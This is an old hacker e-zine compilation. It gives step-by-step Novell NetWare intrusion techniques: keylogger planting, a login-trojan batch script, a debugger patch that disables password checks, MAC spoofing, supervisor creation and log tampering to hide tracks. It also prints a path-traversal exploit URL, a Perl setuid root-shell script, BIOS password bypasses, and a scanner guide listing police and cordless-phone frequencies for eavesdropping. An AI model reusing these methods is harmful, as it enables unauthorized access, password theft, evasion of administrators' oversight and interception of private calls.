Cracking the bios password
--------------------------
Source: alt.2600 faq
Some BIOS's allow you to require a password be entered before the system
will boot. Some BIOS's allow you to require a password to be entered
before the BIOS setup may be accessed.
The most common BIOS password attack programs are for Ami BIOS. Some
password attack programs will return the AMI BIOS password in plain
text, some will return it in ASCII codes, some will return it in scan
codes. This appears to be dependent not just on the password attacker,
but also on the version of Ami BIOS.
To obtain Ami BIOS password attackers, ftp to ftp.oak.oakland.edu
/simtel/msdos/sysutil/.
If you cannot access the machine after if has been powered up, it is
still possible to get past the password. The password is stored in CMOS
memory that is maintained while the PC is powered off by a small
battery, which is attached to the motherboard. If you remove this
battery, all CMOS information will be lost. You will need to re-enter
the correct CMOS setup information to use the machine. The machines
owner or user will most likely be alarmed when it is discovered that the
BIOS password has been deleted.
On some motherboards, the battery is soldered to the motherboard, making
it difficult to remove. If this is the case, you have another
alternative. Somewhere on the motherboard you should find a jumper that
will clear the BIOS password. If you have the motherboard
documentation, you will know where that jumper is. If not, the jumper
may be labeled on the motherboard. If you are not fortunate enough for
either of these to be the case, you may be able to guess which jumper is
the correct jumper. This jumper is usually standing alone near the
battery.
Just getting the dos prompt
---------------------------
You might be thinking what a dos prompt.... doesn't everyone have one.
Senario:Machine is booted in the morning with a bios password, logged into the
network and Windows is loaded . But then the ALT+F column is disabled by a
security program. There is no dos-prompt icons, and the only program is
netscape. The standard windows programs are there other than file manager. The
autoexec.bat,config.sys and the network file (called from the autoexec.bat
c:\nwclient\startnet) are read-only.
Solution:One, load netscape and load the General Preferences section. Change
the viewer source to command.com. Next time the view is loaded, say thank you
and there is a dos prompt.
If Netscape was not available, the next section order of excecution of dos
files, becomes useful. Place a com in the same directory as startnet.bat. The
com file will excecute before the batch file to load any program you wish
before the computer logs into the network. One possibly would be key stroke
logger to catch the password.
But how place the com in c:\nwclient, there is no dos prompt or file manger.
Use write.exe (if you didn't have netscape) to open the com file from drive a:
and save it in the same directory as startnet.bat. Note only write.exe not
notepad.exe has the ability to save com files. In one swoop you have a
dos-prompt and the network password, without the knowlodge of the administrator.
The Execution Order of Dos Files
--------------------------------
Remeber the execution order of dos files:
1. COM
2. EXE
3. BAT
If you remember this, and if a full name of the file ie
c:\nwclient\statnet.bat is not stated, a replacement com or exe file can be
installed.
To be a little smarter, few people have rights to novell operating system
files but usually to spreadsheets or wordprocessors programs. Another useful
idea, is in regard to modem programs. Most netware lans have modem programs
loaded onto them. A simple trap would be to hide a com file, which would load
before the exe. Load a keystroke trapper, and capture all passwords, etc etc
that are passed over the modem. If the com file was hidden, and was used for
only on a temporary basis, this could prove effective, depending on the skill
of your administrator.
Finding valid account's and password's
--------------------------------------
To crack a novell network first of all you need an account. Trying the default
supervisor and guest, would be the first place to start. Often the guest
account will have no password. Beware of intruder detection. Others you might
like to try include:
Backup
Fax
Faxuser
Faxworks
Faxhq
Hplaser
Laser
Laserwriter
Post
Print
Printer
Router
Student
Temp
Test
Wangtek
Login security in layman term's consists of the following four steps:
1. The user logs into the network by specifying the file server name and
username. The system verifies the username by matching it against an objsct in
the NET$OBJ.SYS bindery file. Whether or not the username exists, Netware
prompts for a password.
2. If the system verifies the username, it searches the NET$PROP.SYS file for
a password property. If one exists, it responds with Password: If a password
doesn't exist, the system jumps to step 4.
3. The user enters a password. If the username is valid, Netware compares this
input to the value in NET$VAL.SYS (This database actually holds the encrypted
passwords). IF the username is not valid, the system bypasses the search and
responds with Access Denied.
4. If the user enteres the correct password for this username, they will be
granted conditional access to the LAN. If not the system responds with access
denied. Next the system matches the username with a variety of additional
bindery values.
Therefore you should notice that invalid usernames respond much more quickly
with access denied, as netware doesn't search the bindery for invalid username
passwords.
Another way is to use the utility doskey. As most people will know doskey
keeps your preivous commands in memory. A simple F7 will often reveal alot.
Note if you do not wish anyone to follow your tracks, ALT+F7, will clear the
memory.
Install KeyStroke Trapper
-------------------------
Installing a keystoke logger, is one of the most deadly hacking methods on IBM
pc's. By looking at a config.sys and autoexec.bat, and the general layout of a
pc, you can usually tell how advanced the user is. For example, lots of temp
files in the root directory and little organisation of the startup files, this
usually indicates the user would not notice if one one line was temporaly
added to the autoexec.bat.
Either way copy the keylogging program to the c:\dos directory. Rename it to
something like doskey or mouse or someother tsr, copy the old file to *.old
and hide it through "attrib +h", or remove it totally.
Changing the date of the keylogging program and autoexec.bat to the original
could also be options if needed.
Brute Force Password Cracking
-----------------------------
While I find this option is for the desprite it is still an option. The
program nwpcrack.exe will take a dictionary and then attempt to guess a users
password. Notice this could alert the administrator of your hacking presence
if intruder detection is installed. Also if intruder detection is installed,
this program will keep trying passwords even if the account has been locked.
How to remove password validation
---------------------------------
To disable password verification at the console:
"left-shift""right-shift""alt""esc" To enter debugger
type "c VerifyPassword=B8 0 0 0 0 C3"
type "g"
To restore password verification:
type "d VerifyPassword 5" and write down the 5 byte respone
type c VerifyPassword=xx xx xx xx xx"
type "g"
Ethernet address spoofing with ODI
----------------------------------
Source : Edited heavily from Phrack ?? by Otaku
Login as GUEST or a normal account. Try to see who else is on the system.
USERLIST /A >c:\ulist.txt will give you a list of users currently logged in,
with their Ethernet card addresses saved to a text file . Your current
connection will be marked with an asterisk.
The security aware Novell supervisors, will have set up Backup ccounts with an
extra level of security which restricts logins to only those Ethernet
addresses which have been specified. The really sensible ones will have made
sure that any such machines are sited in physically secure areas, as well.
Although this is a very good idea, from the security point of view, Novell
have now provided a mechanism which allows you to get around this: the
replacement for monolithic IPX/NETX called Open Datalink Interface (ODI)
Novell's ODI, and its slower Microsoft equivalent Network Driver Interface
Specification (NDIS), both work by putting a common layer of software between
the hardware of the Network Interface Card and the rest of the MSDOS
Redirector. This allows multiple protocol stacks and frame types to be bound
to the same physical card e.g.
IPX TCP/IP NETBeui DECnet Appletalk
Link Support Layer
Hardware Specific device driver e.g. NE2000
Under ODI, to load your drivers to enter the network:
LSL
NE2000
IPXODI
NETX
With ODI, there are more parameters for NET.CFG but the worrying/interesting
one is the ability to specify a different MAC level address to that of your
actual Ethernet card. It needs this ability to cope with TCP/IP or DECnet
coexistence e.g.
BUFFERS 100
MACHINE TYPE COMPAQ
PREFERRED SERVER FINANCE
NODE ADDRESS AA-00-04-00-12-34
Since this DECnet address does not depend on the "real" unique Ethernet
address which has been burnt into the PROM on the card and is centrally
registered, this mechanism allows you to put a different Ethernet card address
into NET.CFG, thereby fooling the Address Restriction security.
e.g. NODE ADDRESS 02-60-80-12-34-56
This is where the data you gathered earlier with USERLIST and SYSCON becomes
threatening/useful.
Of course, if your target PC is on a different LAN segment, there may be
Routers or intelligent hubs which restrict your ability to do this, or at
least record attempts in a log files which can trace your activity, provided
that suspicions are aroused before they are periodically wiped out.
If you set this connection parameter to be the same as that of another PC, the
fileserver (Novell, DEC or UNIX) and the Ethernet has no way of preventing
some packets intended for just one unique address going to the other, if they
are both online at the same time. This usually results in PC hangs, incomplete
closure of files, File Allocation Table problems.
If by accident or design, you set your PC to have the same address as the
fileserver (Novell, DEC or UNIX) or a router, then you can cause havoc to the
whole network segment.
Checking your rights in Certain Directories
-------------------------------------------
As previously stated, use "whoami /a" to list the groups you belong to,
security equivalences, and your effective rights.
The sys:system directory
If you have rights to f:\system, try to grab the rconsole password in the
autoexec.ncf, or the bindery files in the same directory. Note these are
hidden files *.sys. To view them "ndir /h" which view all hidden files.
The sys:login directory
If you have access to this directory, well ....
Abusing the Mail Directory Rights
---------------------------------
Most of this attack is taken from the Netware Hack FAQ.
In 3.x the group EVERYONE has Create rights in SYS:MAIL. This means
the user (including GUEST) has the ability to write files to any
subdirectory in SYS:MAIL. The first versions of Netware included a simple
e-mail package, and every user that is created gets a subdirectory in
mail with RCWEMF, named after their object ID number. One consistent
number is the number 1, which is always assigned to Supervisor. Here's
one way to exploit it:
- Login as GUEST and change to the SYS:MAIL subdirectory.
- Type DIR. You will see one subdirectory, the one owned by GUEST. Change
into that directory (ex. here is C0003043)
- Type DIR. If there is no file named LOGIN, you can bet there may not be
one for Supervisor. If there is a default-looking LOGIN file, even a zero
length file, you cannot proceed.
- Copy PROP.EXE and LOGIN.EXE (the itsme version) to SYS:MAIL\C0003043
- Create a batch file (ex. here is BOMB.BAT) with the following entries:
@ECHO OFF
FLAG \LOGIN\LOGIN.EXE N > NUL
COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL
FLAG \LOGIN\LOGIN.EXE SRO > NUL
\MAIL\C0003043\PROP -C > NUL
- Create a LOGIN file with the following entries:
MAP DISPLAY OFF
MAP ERRORS OFF
MAP G:=SYS:
DRIVE G:
COMMAND /C #\MAIL\1\BOMB
DRIVE F:
MAP DELETE G:
- Now copy the files to the Supervisor's SYS:MAIL directory from a drive
mapped to the SYS: volume.
TYPE BOMB.BAT > \MAIL\1\BOMB.BAT
TYPE LOGIN > \MAIL\1\LOGIN
- The next time the Supervisor logs in the LOGIN.EXE is replaced and the
PROP.EXE file is run, capturing passwords. Run PROP.EXE later to get the
passwords, and then once you have all the passwords you need (including
Supervisor) delete your LOGIN and BOMB.BAT file.
Admins can defeat this by creating default personal Login Scripts or by
adding an EXIT command to the end of the System Login Script. Later versions
of Netware create a zero-length LOGIN file at ID creation time in the
SYS:MAIL directories to defeat this.
Strolling over to the Console
-----------------------------
If the monitor has not been assigned a password, usually "secure console"
would not be loaded. This stops nlms from being loaded from drive a: or any
other directory than sys:system. If a password has been assigned, ops reboot
the server an there will not be a password.
To add a user from the console use burglar.nlm. This will create a super-user
of your choice. To change any users password use setpwd.nlm.
Hack.exe ... no Packet Signatures
---------------------------------
If you are on a 3.1x network and no packet signatures are loaded, you can
easily become supervisor. The only problem is that all users will become
supervisors.
Attacking the Console through Rconsole
--------------------------------------
1. Login as guest, or any user and check if accounting is installed.
2. Load rconsole, sometimes this requires supervisor rights depending on the
version of rconsole you are using.
3. Attempt the password, remote, /p= or /s= are often used. It should be noted
that if you can capture an rconsole session with an ethernet analyser, the
rconsole password can be extracted. Refer to rconfaq.zip below..
4. Once you have the correct password, type "modules", and view what is
loaded. If conlog.nlm is loaded unload it. Get a feel for what is loaded, type
"config" this will tell you what protocols are loaded.
5. Load burglar.nlm or setpwd.nlm, to create a new user or change the password
of another.
6. If conlog was not loaded, "load delay 30 cls", therefore when you exit
rconsole no tracks will be left behind.
7. Exit rconsole, login and do what you will.
8. Clean the logs, sys:system\sys$log.err, delete and purge and nlms loaded.
9. If conlog was loaded, enter rconsole and downing the server is an option to
clear the log file.
Cracking the Bindery Files
--------------------------
FS3/SYS:SYSTEM
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
NET$OBJ SYS 7,360 2-09-96 11:30p [Rw-A-HSy-T--------] SUPERVISOR
NET$PROP SYS 25,364 2-09-96 11:30p [Rw-A-HSy-T--------] SUPERVISOR
NET$VAL SYS 108,914 2-12-96 10:23a [Rw-A-HSy-T--------] SUPERVISOR
These are the bindery files for novell netware and despite somewhat unpopular
belief, it is possible to crack password unix style by obtaining the password
files. How to close and copy the bindery files. Create the following batch file:
@echo off
bindclos
cd\system
flag net$obj.sys -hsyt
flag net$prop.sys -hsyt
flag net$val.sys -hsyt
copy net$obj.sys a:\
copy net$prop.sys a:\
copy net$obj.sys a:\
flag net$obj.sys +hsyt
flag net$prop.sys +hsyt
flag net$val.sys +hsyt
bindopen
Note that bindclos and bindopen are part of the jrbutils. Also openning and
closing the bindery will create messages in the log file sys:system.
The problem here is that the sys:system directory is restricted.
Syscon - Clear text passwords
-----------------------------
Older versions of SYSCON like the one shipped with NetWare 3.11 - version
3.62, I believe, encrypt the passwords so they are not in clear text accross
the network. The version that ships with NetWare 3.12 (3.75) certainly does
not encrypt the passwords, therefore passwords can be captured by enternet
sniffers.
Pmail
-----
--- From a local source ---
Subject: Re: students breaking into network through pmail
I would recommend creating a rules.pmq file in all users mail
directories to prevent this. Even if a user doesn't have supervisor
rights, you could have the program do a number of things. If nothing
else, they could have the user delete all the mail files.
The easiest way that I could think of doing this would be to create
a rules.pmq file and then copying it into each users mail directory.
This could be done by creating a dummy rules.pmq file, and use
a program like pcmag's sweep program.
F:\MAIL>sweep if not exist rules.pmq copy \mail\1\rules.pmq
I don't know if creating a zero byte rules.pmq would work with pegasus. It
might not like a zero byte file, and you can copy a zero byte file.
Perhaps it would be best to have Pegasus mail create an empty rules
file if one doesn't exist to prevent this. That would be the easiest
thing to totally solve the problem.
> I have recently caught a student using the following procedure
>
> create a rules.pmq in their own a account that sets up a rule to execute
> a program on receipt of any mail. the program run line is
>
> COMMAND /C H:\MAIL\target users mail dir\gotya.bat
>
> they then copy this rules.pmq into a users mail directory (ONLY WORKS IF
> USERS DOES NOT HAVE A RULES.PMQ ALREADY) they then create a gotya.bat in
> the target users mail directory to do anything they want.
>
> I tested and was able using the guest account which has C rights in the
> mail dir to copy John Bairds (JRB UTILS) SETEQUIV into a supervisor
> equivs mail directory plus a batch file the when run it would change
> guest to be a supervisor equivelent. Copied a rules.pmq to run this
> batch file. then delete all related files.
>
> When the super equiv read their mail (as I watched!) the screen went
> black as the rules were processed and then carried on. No indication of
> what had been done to the super user but guest had super rights.
>
> has any one else tried this or seen this? The only way to stop this was
> to copy a empty RULES.PMQ into each users mail dir.
>
--- End excerpt ---
Problems with the netware http
------------------------------
Subject: *** SECURITY ALERT ***
I spent some time exploring Novell's HTTP server and out of the box
there is a CGI that is VERY VERY INSECURE!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
If you are running the Novell HTTP server, please disable the CGI's
it comes with it until you understand (fully understand) what the
security risks are.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
The CGI in question is convert.bas (yes, cgi's in basic, stop laughing).
(There may be more CGI's in the scripts dir that can be exploited
but this was all I could stomoch.)
A remote user can read any file on the remote file system using
this CGI. This means that if you are running the Novell HTTP
server and have the 'out of box' CGI's, you are breached.
Exploit code:
http://victim.com/scripts/convert.bas?../../anything/you/want/to/view
How a Uebercracker keeps his rights
===================================
Trojaning the Netware Login Process
------------------------
-----------
If you have attained supervisor status, it is relativly easy to trojan the
login process to reveal all users passwords to any user. This is done throught
the utilisation of two utilities written by itsme.
Firstly a replacement login.exe and prop.exe to create a property in the
bindery to hold the clear passwords. Here is the process:
1. Note the original login.exe's file dates and owner.
1. Copy the trojaned login.exe to the sys:login directory, and use filer to
change file's date's and owner to that of the original login.exe.
2. Flag the trojaned login.exe "ros" through flag login.exe +sro.
3. Run "prop -c" to create the new property from a floppy disk.
4. Purge the original login.exe
5. At any time with any rights "prop -r" will retreive a list of users and
passwords.
Super.exe
---------
Allows a user to switch supervisor equivalence on and off. The user must
already be supervisor equivalent, the first time it is used. Super changes the
users bindery entry under NW 2.X and 3.1X up to 3.11 to allow it to toggle
supervisor equivalence. Under 3.12 Novell, prevented this modification so
instead Super makes the user a manager of both supervisor and his/her own
usercode.
Where are those error logs and what do they log ?
-------------------------------------------------
Part of this is taken from Edinburg Tech Library
FS3/SYS:SYSTEM
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
SYS$LOG ERR 78,684 2-09-96 11:30p [Rw-A--------------] SUPERVISOR
78,684 bytes in 1 files
81,920 bytes in 20 blocks
System error log. This file is an ascii file and is readable by any standard
editor or viewer. Can be read from within SYSCON/Supervisor optioins/View file
Server Error Log. After reading press ESCAPE to exit. You will be prompted to
clear the error log. Answer yes or no It contains entries of events such as
Intruder Lockouts, volume mounts and dismounts.
A better way to edit log files is to load "filer" before you edit the file.
Note the dates created, last access and who owns the file. Then edit the file,
re-enter filer and change the dates/owner back to the originals.
Here are some example entries in the system logger:
8/19/95 1:29:22 pm Severity = 4.
1.1.136 FS3 NetWare Copyright Violation! Call SUPERVISOR!
Server at address FACADE99:000000000001 also has my serial number
12/14/95 1:03:01 pm Severity = 0.
1.1.110 System time changed by station 25 to 12/14/1995 12:52:48 pm
2/8/96 11:30:43 pm Severity = 0.
1.1.63 Bindery close requested by user BACKUP on station 34
2/8/96 11:30:45 pm Severity = 0.
1.1.61 Bindery open requested by user BACKUP on station 34
2/9/96 2:08:13 pm Severity = 0.
0.0.0 Remote Console Connection Granted for 00000002:0000E8CF7661
2/9/96 2:08:24 pm Severity = 0.
0.0.0 Remote Console Connection Cleared for 00000002:0000E8CF7661
FS3/SYS:SYSTEM
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
NET$ACCT DAT 34,528 2-12-96 3:00p [RwSA-----T--------] FS3
34,528 bytes in 1 files
36,864 bytes in 9 blocks
Netware audit trial. If accounting is installed on the server than all logins
and logouts are recorded here along with disk read and writes if charging is
in force. Note the file is flagged with a T meaning transactional file, and
cannot be deleted when this attribute is set. To remove this flag the file :
flag net$acct.dat -t
and then delete the file. The system will generate a new file flagged
appropriately at the time of the next event.
FS3/SYS:
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
TTS$LOG ERR 7,828 2-02-96 1:16p [RwSA--------------] SUPERVISOR
7,828 bytes in 1 files
8,192 bytes in 2 blocks
Here are some example entries in the transactional log.:
Friday February 2, 1996 1:17:50 pm
TTS has been shut down
Friday February 2, 1996 1:16:23 pm
Initializing Transaction Tracking System
FS3/SYS:
Files: Size Last Updated Flags Owner
----------------- ------------- --------------- -------------------- ---------
VOL$LOG ERR 14,009 2-02-96 1:16p [RwSA--------------] SUPERVISO
14,009 bytes in 1 files
16,384 bytes in 4 blocks
In the root of each volume there exists an ascii file vol$log.err. This
records the date and time of the last known good mount of that particular
volume. Where a volume is not preceded by a volume dismount, assuming that
this is not the start of anew file, this is an indication that a server crach
or abend has occured.
Here are some example entries in the volume logger:
Volume SYS mounted on Monday August 7, 1995 4:43:52 pm.
Volume SYS mounted on Monday August 7, 1995 5:17:01 pm.
sys:\etc\conlog.log
An site running conlog.nlm will have a console log file. This file logs all
activities on the console. When conlog.nlm is loaded, the log file is zero
bytes and can be typed, but not edited. To edit the log file, the nlm must be
unloaded from the console. When downing the server if conlog is not unloaded
an error message is sent to the console.
To defealt console login, down the server through the following commands.
Remove Dos
Down
Exit
This will work due to the fact that the console.log is deleted and re-created
every time the conlog is loaded.
A listing of what some utilities can do to penetrate Novell Netware
-------------------------------------------------------------------
Trojan the Netware login process
Netware Password cracker, that encypts password attempts
Key Stroke Logger
Delays NLM commands on the console
Check for null passwords.
How to break the rconsole encryption.
Break the rconsole encryption.
Create a super-user from the console.
Change any users password from the console.
Become super-user on 3.11 without Packet Signatures.
Grant super rights, them allow them to be toggled.
Create a temporary file server.
Remove the delete inhibit flag.
Play with Netware's bindery.
There is a set of utilities called the JRButils. The lastest version being
V2.30.
Please sent comments or suggestions to diceman@fl.net.au
._________________________________________________________________________.
-= CERT Advisory Snippet Issue #1
-= Perl Exploit
The relevance CERT Advisory is CA-96.12. The vulnerability results in anyone
with access to an account gaining root access.
Within the next issue, there should be a detailed explaination of the exploit.
<------------------------------- cut ---------------------------------------->
#!/usr/bin/perl -U
# Remember to chmod 4755
#
# This exploit is a little aged although it might work.
#
$ENV{PATH}="/bin:/usr/bin";
$>=0;
$<=0;
exec("/bin/bash");
<------------------------------- cut ---------------------------------------->
Every month we will be investigating recent CERT advisorys & reporting back
the bugs & the patches.
.____________________________________________________________________________.
/-\./-\./-\./-\./-\./-\
| Scanning Made Easy |
| By Myst |
\-/.\-/.\-/.\-/.\-/.\-/
This is an article to help you novice scanner people out there get the most
when buying and using your scanner (I don't mean picture scanning either;)
-= What are scanners? =-
Scanners are a device used to receive all those wonderful radio signals
that pass through our bodies every second of everyday. They are capable of
receiving only, therefore are NOT illegal (Although some scanners which can
reach the mobile phone frequencies are now considered illegal). They allow
the user to hear the wonders of the city around them, before the news and
radio stations even know whats going on. By listening in to the police
(not illegal:), fire departments, telstra and even TV stations etc you are
able to hear all the latest and greatest news.... Car crashes,
Armed Robbery, Domestic Disputes, even hear the cops bitchin' over who ate
the last doughnut :)
-= Where can I get one of these wonderful devices? =-
Well, if your the rich and lazy type, try your local Dick Smith store (What
don't they hold??:), or if you prefer to get something a little more worth
the value, try speciality shops that stock amateur radio equipment, they
are bound to have better prices, but you never know, shop around a bit first.
You can even order them off the internet (I think), but thats at your own risk.
It is also possible that some old (often still good in value) scanners are
available at HAM conventions. This is basically just a get together of
Amatuer Radio guys/gals to sell off old equipment and have some fun on the
activities. Even look in the paper, you just never know (New scanners are
made to not access in the mobile phone frequencies, but the older ones
still can, so they are sometimes a better buy).
-= What should I look for when buying a scanner? =-
Well, it does kinda depend on the price range and whether you wont a portable
or base station type (portables can be taken with you on your trips around the
world, whereas a base station is placed at one location and usually not
moved).
The major pros with portables is that they are usually cheaper and can be
taken to sporting events etc, but they often compromise a bit in the
quality and clearness of the signal (this also depends on the brand of
scanner and the antennae in use).
Because base stations are rarely moved around, it is wise to have a mounted
antenna somewhere on your roof. This gives better range and is especially
good for picking up those city transmissions from within the country. This
often makes base station models a wiser choice, but there is nothing stopping
you from using a roof mounted scanning antenna with your portable whilst at
home, and then a little rubber duckie (flexible antenna for those who dont
know) or similar whilst outside soaking up the sun. Also, base stations
often have extra features that are not found on some portable models.
Sum up your own needs and decide which would be better for you.
-= What brand should I get? =-
Generally stick with Uniden, Cobra etc. It again depends on price and the
functions you may want (See below). Ask around a bit and see what the dealers
can do for you. Generally radio equipment is always pretty good on the
quality side, but like always there are some that dont quite cut it.
-= What functions are available in scanners? What functions will I want? =-
Most (all?) scanners have the ability to store frequencies. You WILL want
this. It is pretty much a standard thing. The older models start off with
a 16 channel memory, with some of the later models having 100, 300 or even
500 channel capacities.
You program these memory channels with desired frequencies, then you can make
your scanner scan them for any activity. Different model scanners can scan
these memories faster than others.
Other important features include:
Data Skip - This feature allows the scanner to skip over unwanted data
transmissions and substantially stops you from hearing interference signals
or annoying signals.
Priority Channels - These are programmed with the most important frequencies.
Then whilst monitoring other stuff, the scanner can be made to check these
for activity automagically, every few seconds. Useful feature.
Progamable Searching - This allows you to search between two frequencies,
for activity.
Channel Lock out - lock channels, so that they are not scanned.
Automatic Store - Automatically searches out and stores frequencies to an
available channel location and automatically return to find the next active
frequency.
Plus I am sure there are other features, depending upon the make and model.
Ask the sale guy if your not sure. Hell thats what they are there for :)
-= I have a scanner, but now what? =-
OKEY! You have a scanner, lets get on the road! but wait, you dont want to
sit around all day searching for 'interesting' frequencies to watch, that
could take forever. Luckily for us, there are people in this world who either
through torture or work (maybe both:) make up frequency lists and distribute
them.
I know that Dick Smith stocks 'some' frequency books, but these you have
to pay for (who wants to pay for things in this world?), so check with local
bulletin boards, the Internet (NO, not that word again;), friends, relatives,
strangers, leave messages, you get the picture. Eventually you *WILL* find
frequencies for your area. If you live in or near major cities, then I can
guarantee you that there are frequency lists for your area. I will even
include some with this article (I am a generous kind of guy).
You want frequencies! Then frequencies you will get!
First a few rules to 'safe' scanning, yes they must be told :)
* Dont get in the way of emergency people! If you hear of a
fire or whatever, think twice before rushing out and getting in the way.
Just use your brain, thats all I am saying :)
* Don't poke your rubber duckie antenna in your eye (yes they do hurt;)
* Computers and the like can interfere majorily with the operation of
scanners, causing unwanted interference, so generally keep them separated.
* Always strap your scanner on your side, before leaving the house, unless
you plan on going to: 1. Your girlfriends house
2. A party
3. A fun park
4. Anywhere you might end up pissed :)
Now, on with the list!
These are just frequencies I have collected from numerous sources over the
years. I dont guarantee any of them. Most are fairly recent though and
*should* work. This is by far not a complete list (it comes nowhere close).
To find more comprehsive lists, try the web/ftp links at the bottom of the
article.
-= POLICE =-
<Frequency> <Callsign> <City>
123.100 VKC MELBOURNE
123.200 VKC MELBOURNE
131.600 VKC MELBOURNE
156.375 VKC MELBOURNE
123.100 VKC MELBOURNE
123.200 VKC MELBOURNE
131.600 VKC MELBOURNE
156.375 VKC MELBOURNE
156.675 VKC MELBOURNE
156.725 VKC MELBOURNE
168.250 VKC MELBOURNE
168.400 VKC MELBOURNE
413.975 VJV434 MELBOURNE
450.525 VKC MELBOURNE
450.650 VKC MELBOURNE
450.675 VKC MELBOURNE
468.000 - 470.000 VKC MELBOURNE
852.7875 VKC MELBOURNE
467.850 PERTH
467.875 PERTH
467.900 PERTH
467.925 PERTH
467.950 PERTH
467.975 PERTH
468.000 PERTH
468.025 PERTH
468.050 PERTH
468.075 PERTH
468.100 PERTH
468.125 PERTH
468.150 PERTH
468.175 PERTH
468.200 PERTH
468.225 PERTH
468.250 PERTH
468.275 PERTH
468.300 PERTH
468.325 PERTH
468.350 PERTH
468.375 PERTH
468.400 PERTH
468.425 PERTH
468.450 PERTH
468.475 PERTH
468.500 PERTH
468.525 PERTH
468.550 PERTH
468.575 PERTH
468.600 PERTH
468.625 PERTH
468.650 PERTH
468.675 PERTH
468.700 PERTH
468.725 PERTH
468.750 PERTH
468.775 PERTH
468.800 PERTH
468.825 PERTH
468.850 PERTH
468.875 PERTH
468.900 PERTH
468.925 PERTH
468.950 PERTH
468.975 PERTH
469.000 PERTH
469.025 PERTH
469.050 PERTH
469.075 PERTH
469.100 PERTH
469.125 PERTH
469.150 PERTH
469.175 PERTH
469.200 PERTH
469.225 PERTH
469.250 PERTH
469.275 PERTH
469.300 PERTH
469.325 PERTH
469.350 PERTH
469.375 PERTH
469.400 PERTH
469.425 PERTH
468.400 SYDNEY
468.525 SYDNEY
468.950 SYDNEY
468.450 NTH SYDNEY
468.200 NTH SYDNEY
468.925 NTH SYDNEY
468.725 SYDNEY
467.900 SYDNEY
469.300 SYDNEY
468.075 SYDNEY
467.950 SYDNEY
468.750 SYDNEY
468.700 SYDNEY
468.000 SYDNEY
468.425 SYDNEY
469.275 SYDNEY
468.675 SYDNEY
468.375 SYDNEY
468.550 SYDNEY
469.075 SYDNEY
468.475 SYDNEY/CAR 2 CAR
468.775 SYDNEY/CAR 2 CAR
458.950 Alice Springs / N.T.
458.975 Alice Springs / N.T.
468.450 Alice Springs / N.T.
468.475 Alice Springs / N.T.
-= AMBULANCE =-
<Frequency> <Callsign> <City>
412.5000 VL3NE MELBOURNE
412.5250 VH3HYA MELBOURNE
412.7500 VL3NE MELBOURNE
413.0750 VL3NE MELBOURNE
413.3500 VL3NE MELBOURNE
413.4250 VL3WX MELBOURNE
470.4000 VM3SJ MELBOURNE
470.9750 VM3SJ MELBOURNE
453.825 Northern Territory
454.125 Northern Territory
462.950 Alice Springs
463.325 Northern Territory
463.625 Alice Springs
-= FIRE BRIGADE =-
<Frequency> <Callsign> <City>
458.275 MELBOURNE
457.975 MELBOURNE
457.375 MELBOURNE
455.575 MELBOURNE
-= Mobile Phonez! =-
Okey, I dont have much info here, except the stuff from personal experience.
For starters, every scanner sold now days will not go within the mobile phone
range. So you might need to look around for some older models, but
make sure to check out in the manuals whether or not they can reach up to
the 800 - 900MHz range. Many Amatuer Radio handhelds and others can also
get in the mobile area (If you have your Amateur license of course).
Only analog phonez can be heard from scanners (digital make use of encryption
techniques, so they can be picked up, just not understood).
The only frequency I have experienced mobiles on is between 914.000 and
931.000. The mobile towers seem to pick a frequency between this range,
depending upon the amount of traffic or wotever. So there is no set
frequency that you can always find the phones on. Scan between those two
continuously and you are bound to get something (In my area anyway). I have
no idea whether these are different in other city's (Someone may want to help
me out with all this). Just try it and see what you get.
Also, it is common (where I live anyway) for the phones to 'drop-out' while
someone is in the middle of a conversation and go to another frequency. A
series of 'beeps' is heard a minute or so before this happens.
The only explanation I have for this is that the mobile phone becomes closer
to a different cell and so switches (the new cell choosing a different
frequency). Someone wanna help me out here too? I think I need to do a
Telstra course or something :)
-= Amateur Radio Repeaters =-
These are sometimes interesting to listen to (I emphasis the 'sometimes':)
Instead of re-typing all these out, you can find them in the back of your
handy 'ol Dick Smith book.
Also contained in that book are the UHF CB Repeater listings and some various other
stuff.
Repeaters are just a device that picks up an input signal from one freq.
and then re-transmitts that signal with higher power on another freq.
This allows someone with only a small handheld radio to be picked up by
someone a hunderd km's away.
-= Telstra Stuff =-
I dont have any! I want some! Can someone please give me some info on
Tesltra's frequencies. Like the one used by the repair crews etc (Preferably
for Melbourne, but hey, I'll take what I can get :)
-= Airports =-
Whenever you go to an airport TAKE YOUR SCANNER. There a great place for all
sorts of interesting transmissions. For instance, the planes, airtraffic
controllers, ground people (including refueling trucks etc), P.A systems,
weather reports plus more!
You might even be able to hear some of the radars active - Ground,
long distance etc.
<Frequency> <Callsign> <City>
118.200 Avalon Airport
120.100 Avalon Airport
314.600 Avalon Airport
130.600
130.650 Ansett / Tullarmarine
130.950 Ansett / Tullarmarine
461.425 Ansett / Tullarmarine
463.675 Ansett / Tullarmarine
470.175 Ansett / Tullarmarine
471.925 Ansett / Tullarmarine
131.900 Qantas / Tullarmarine
166.660 Qantas / Tullarmarine
461.100 Qantas / Tullarmarine
464.950 Qantas / Tullarmarine
465.625 Qantas / Tullarmarine
Most airport activity seems to be between the 120.000 and 135.000 range.
-= FUN STUFF =-
< Cordless Telephones - Hear your neighbours >
Base Unit Only
30.075
30.100
30.125
30.150
30.175
30.200
30.225
30.250
30.275
30.300
Also try these:
Base Handset
43.72 48.76
43.74 48.84
43.82 48.86
43.84 48.92
43.92 49.02
43.96 49.08
44.12 49.10
44.16 49.16
44.18 49.20
44.20 49.24
44.32 49.28
44.36 49.36
44.40 49.40
44.46 49.46
44.48 49.50
46.61 49.67
46.63 49.845
46.67 49.86
46.71 49.77
46.73 49.875
46.77 49.83
46.83 49.89
46.87 49.93
46.93 49.99
< CB's (Who'd wanna listen to them anyway) >
01 - 26.965 11 - 27.085 21 - 27.215 31 - 27.315
02 - 26.975 12 - 27.105 22 - 27.225 32 - 27.325
03 - 26.985 13 - 27.115 23 - 27.255 33 - 27.335
